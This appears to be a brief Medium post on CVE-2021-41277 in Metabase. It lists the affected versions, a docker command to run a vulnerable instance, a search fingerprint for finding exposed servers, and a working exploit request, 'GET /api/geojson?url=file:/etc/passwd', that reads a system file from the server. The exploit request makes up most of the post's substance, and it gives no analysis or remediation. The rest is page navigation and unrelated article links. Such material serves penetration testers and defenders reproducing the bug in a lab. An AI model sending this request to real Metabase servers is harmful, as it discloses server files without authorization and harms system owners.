CVE-2021–41277 Metabase sensitive information disclosure

app="metabase"
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
GET /api/geojson?url=file:/etc/passwd HTTP/1.1

--

--

--

#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A Practical Guide to Cyber-security Engagement

BGP spoofing and SSH MiTM with Cowrie

What exactly is a network transition, and how does it function?

YFIX Chain Token Free Airdrop.

{UPDATE} Seek And Hide ABC Hack Free Resources Generator

MCS MainNet Early Bird Registration Event Has Started💡

New Coin Listing] KILT Protocol (KILT) Officially Launches on DigiFinex

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0x0021h

0x0021h

#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

More from Medium

Insecure Deserialization — FAQ

Walkthrough : hackyourselffirst.troyhunt.com

[Hack The Box] Forge— Walkthrough

The Tale of a Click leading to RCE